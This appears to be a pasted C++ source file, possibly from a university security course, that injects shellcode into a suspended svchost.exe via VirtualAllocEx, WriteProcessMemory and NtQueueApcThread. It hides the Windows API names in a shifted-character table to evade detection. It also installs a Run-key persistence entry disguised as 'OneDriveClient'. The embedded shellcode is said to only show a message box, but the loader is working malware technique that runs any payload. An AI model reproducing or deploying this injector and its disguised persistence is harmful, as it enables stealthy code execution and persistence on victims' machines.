· 6 years ago · Aug 28, 2019, 10:18 PM
1#include "stdafx.h"
2#include <windows.h>
3#include <iostream>
4#include <tchar.h>
5#include <psapi.h>
6#include <tchar.h>
7#include <clocale>
8#include <shlobj.h>
9#include <string>
10
11using namespace std;
12
13// This is the malicious code to be injected in the legitimate process.
14// This shellcode just pops up an error window displaying "Hi INFO0045"
15unsigned char shellcode[] =
16"\x89\xe5\xd9\xc6\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
17"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
18"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
19"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
20"\x59\x6c\x6d\x38\x4e\x62\x35\x50\x77\x70\x55\x50\x43\x50\x6d"
21"\x59\x4b\x55\x54\x71\x49\x50\x43\x54\x6c\x4b\x32\x70\x30\x30"
22"\x6c\x4b\x36\x32\x36\x6c\x4c\x4b\x31\x42\x34\x54\x6e\x6b\x33"
23"\x42\x57\x58\x66\x6f\x4f\x47\x63\x7a\x64\x66\x44\x71\x39\x6f"
24"\x4c\x6c\x65\x6c\x75\x31\x73\x4c\x75\x52\x54\x6c\x71\x30\x49"
25"\x51\x7a\x6f\x64\x4d\x57\x71\x4b\x77\x39\x72\x49\x62\x71\x42"
26"\x62\x77\x4e\x6b\x36\x32\x44\x50\x6c\x4b\x61\x5a\x35\x6c\x6e"
27"\x6b\x42\x6c\x67\x61\x51\x68\x68\x63\x63\x78\x36\x61\x4b\x61"
28"\x46\x31\x6c\x4b\x50\x59\x77\x50\x75\x51\x4b\x63\x6e\x6b\x51"
29"\x59\x65\x48\x38\x63\x34\x7a\x71\x59\x4c\x4b\x36\x54\x6c\x4b"
30"\x43\x31\x69\x46\x46\x51\x79\x6f\x6e\x4c\x59\x51\x6a\x6f\x36"
31"\x6d\x46\x61\x78\x47\x66\x58\x49\x70\x52\x55\x5a\x56\x53\x33"
32"\x63\x4d\x7a\x58\x75\x6b\x43\x4d\x45\x74\x63\x45\x6b\x54\x32"
33"\x78\x4e\x6b\x76\x38\x45\x74\x46\x61\x4b\x63\x75\x36\x6c\x4b"
34"\x36\x6c\x52\x6b\x6c\x4b\x52\x78\x67\x6c\x76\x61\x59\x43\x4c"
35"\x4b\x53\x34\x4e\x6b\x45\x51\x48\x50\x6b\x39\x42\x64\x44\x64"
36"\x57\x54\x31\x4b\x43\x6b\x61\x71\x30\x59\x52\x7a\x72\x71\x79"
37"\x6f\x4b\x50\x53\x6f\x33\x6f\x61\x4a\x6e\x6b\x34\x52\x38\x6b"
38"\x6e\x6d\x53\x6d\x53\x5a\x57\x71\x6c\x4d\x6c\x45\x4c\x72\x63"
39"\x30\x73\x30\x47\x70\x32\x70\x75\x38\x74\x71\x6e\x6b\x32\x4f"
40"\x6e\x67\x69\x6f\x4b\x65\x6f\x4b\x7a\x50\x78\x35\x49\x32\x72"
41"\x76\x72\x48\x6f\x56\x4e\x75\x6d\x6d\x4f\x6d\x39\x6f\x4a\x75"
42"\x57\x4c\x56\x66\x71\x6c\x67\x7a\x6f\x70\x6b\x4b\x69\x70\x71"
43"\x65\x43\x35\x4f\x4b\x43\x77\x55\x43\x72\x52\x30\x6f\x71\x7a"
44"\x45\x50\x52\x73\x39\x6f\x7a\x75\x45\x33\x75\x31\x32\x4c\x52"
45"\x43\x34\x6e\x65\x35\x62\x58\x62\x45\x45\x50\x41\x41";
46
47string Apicalls[19] = { "PvSwgwgCreVjtgcf", //"NtQueueApcThread", 0
48"VjtgcfJcpfng", //"ThreadHandle", 1
49"CreTqwvkpg", //ApcRoutine", 2
50"CreTqwvkpgEqpvgzv", //"ApcRoutineContext", 3
51"CreUvcvwuDnqem", //"ApcStatusBlock", 4
52"CreTgugtxgf", //"ApcReserved", 5
53"IgvOqfwngJcpfngC", //"GetModuleHandleA", 6
54"IgvRtqeCfftguu", //"GetProcAddress", 7
55"UVCTVWRKPHQ", //"STARTUPINFO", 8
56"RTQEGUUaKPHQTOCVKQP", //"PROCESS_INFORMATION" , 9
57"\\gtqOgoqt{", //"ZeroMemory", 10
58"EtgcvgRtqeguuY", //"CreateProcess", 11
59"ETGCVGaUWURGPFGF", //"CREATE_SUSPENDED", 12
60"XktvwcnCnnqeGz", //"VirtualAllocEx", 13
61"OGOaEQOOKV", //"MEM_COMMIT", 14
62"RCIGaGZGEWVGaTGCFYTKVG", //"PAGE_EXECUTE_READWRITE", 15
63"YtkvgRtqeguuOgoqt{", //"WriteProcessMemory", 16
64"TguwogVjtgcf", //"ResumeThread", 17
65"EnqugJcpfng" }; //"CloseHandle" 18
66
67typedef BOOL(__stdcall *aka)(LPCWSTR, LPTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
68aka Cp;
69typedef LPVOID(WINAPI *aka2)(_In_ HANDLE, _In_opt_ LPVOID, _In_ SIZE_T, _In_ DWORD, _In_ DWORD);
70aka2 Va;
71typedef BOOL(__stdcall *aka4)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T);
72aka4 Wpm;
73typedef BOOL(WINAPI *aka5)(HANDLE); //function prototype
74aka5 Rth;
75// decrypt fucntion names
76string decryptor(int key, string str) {
77 int i;
78 for (i = 0; (i < 100 && str[i] != '\0'); i++) {
79 str[i] = str[i] - key; //the key for encryption is 3 that is subtracted to ASCII value
80 }
81 return str;
82}
83
84// Some dynamic DLL linking to access some API calls
85NTSTATUS(NTAPI *NtQueueApcThread)
86(_In_ HANDLE ThreadHandle, _In_ PVOID ApcRoutine,
87 _In_ PVOID ApcRoutineContext OPTIONAL, _In_ PVOID ApcStatusBlock OPTIONAL,
88 _In_ ULONG ApcReserved OPTIONAL);
89
90BOOL LoadNtdllFunctions() {
91 HMODULE hNtdll = GetModuleHandleA("ntdll");
92 if (hNtdll == NULL)
93 return FALSE;
94
95 NtQueueApcThread =
96 (NTSTATUS(NTAPI *)(HANDLE, PVOID, PVOID, PVOID, ULONG))GetProcAddress(
97 hNtdll, "NtQueueApcThread");
98 if (NtQueueApcThread == NULL)
99 return FALSE;
100}
101FARPROC GT(LPCSTR LB, LPCSTR NM) {
102 HMODULE lb;
103 lb = LoadLibraryA(LB);
104 if (lb == NULL) {
105 return 0;
106 }
107 return GetProcAddress(lb, NM);
108}
109
110void main()
111{
112 if (LoadNtdllFunctions() == FALSE) {
113 cout << "Failed to load NTDLL functions.\n" << endl;
114 return;
115 }
116
117 STARTUPINFO si;
118 PROCESS_INFORMATION pi;
119
120 ZeroMemory(&si, sizeof(si));
121 si.cb = sizeof(si);
122 ZeroMemory(&pi, sizeof(pi));
123
124 // Start the child (legitimate) process svchost.exe
125 char kr[13];
126 string kernel = "Kernel32.dll";
127 strcpy_s(kr, kernel.c_str());
128 Cp = (aka)GT(kr, (decryptor(2, Apicalls[11])).c_str());
129 if (!Cp(L"C:\\Windows\\System32\\svchost.exe", // Path to executable to call in the process
130 NULL, // Command line
131 NULL, // Process handle not inheritable
132 NULL, // Thread handle not inheritable
133 FALSE, // Set handle inheritance to FALSE
134 CREATE_SUSPENDED, // We want the created to be suspended
135 NULL, // Use parent's environment block
136 NULL, // Use parent's starting directory
137 &si, // Pointer to STARTUPINFO structure
138 &pi) // Pointer to PROCESS_INFORMATION structure
139 )
140 {
141 cout << "CreateProcess failed (" << GetLastError() << ")." << endl;
142 return;
143 }
144
145 // Allocate some memory inside the child process
146 Va = (aka2)GT(kr, (decryptor(2, Apicalls[13])).c_str());
147 LPVOID baseAddress = Va(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
148 if (baseAddress == NULL) {
149 cout << "Cannot allocate in created process" << endl;
150 system("pause");
151 return ;
152 }
153
154 // Write the shellcode inside the allocated memory of the child process
155
156 Wpm = (aka4)GT(kr, (decryptor(2, Apicalls[16])).c_str());
157 if (!Wpm(pi.hProcess, baseAddress, shellcode, sizeof(shellcode), NULL)) {
158 cout << "Cannot write into child process memory" << endl;
159 system("pause");
160 return ;
161 }
162 // Queue an Asynchronous Procedure Call (APC) to the child process main thread thread.
163 // This APC goes directly to the injected Shellcode
164 if (NtQueueApcThread(pi.hThread, baseAddress, 0, 0, 0)) {
165 cout << "Cannot queue APC to main thread" << endl;
166 }
167
168 // Resume the main thread :
169 // ------------------------
170 // This will check if there are APC queued. If there are, these APCs will
171 // be executed before the main thread of the child process actually resumes.
172
173
174 Rth = (aka5)GT(kr, (decryptor(2, Apicalls[17])).c_str());
175 if (Rth(pi.hThread) == -1) {
176 cout << "Cannot resume the main thread of the child process" << endl;
177 return ;
178 }
179
180 // This prints the pid of the created svchost process. You can check that it is
181 // indeed created by typing the command "tasklist" in the cmd and searching
182 // for the corresponding pid (or type : tasklist /fi "pid eq x" where x is the pid
183 // of the
184
185
186
187 //add reg
188
189 //create regkey
190 // TCHAR szPaths[MAX_PATH];
191 DWORD pathLen = 0;
192 TCHAR CurrentDirz[MAX_PATH];
193
194
195 if (SUCCEEDED(SHGetFolderPath(NULL,
196 CSIDL_APPDATA,
197 NULL,
198 0,
199 CurrentDirz))) {
200 wstring LoaderRoaming = L"\\OneDriveClient.exe ";
201 wstring FinalREG = (wstring)CurrentDirz + LoaderRoaming;
202
203 _tcscpy(CurrentDirz, FinalREG.c_str());
204
205 }
206 pathLen = _tcslen(CurrentDirz);
207
208 HKEY newValue;
209 if (RegOpenKey(HKEY_CURRENT_USER,
210 TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"),
211 &newValue) != ERROR_SUCCESS)
212 {
213 return ;
214 }
215 DWORD pathLenInBytes = pathLen * sizeof(*CurrentDirz);
216 if (RegSetValueEx(newValue,
217 TEXT("OneDriveClient"),
218 0,
219 REG_SZ,
220 (LPBYTE)CurrentDirz,
221 pathLenInBytes) != ERROR_SUCCESS)
222 {
223 RegCloseKey(newValue);
224 return ;
225 }
226 RegCloseKey(newValue);
227
228 cout << "Process id of svchost.exe is : " << pi.dwProcessId << endl;
229
230 // Close process and thread handles.
231 CloseHandle(pi.hProcess);
232 CloseHandle(pi.hThread);
233}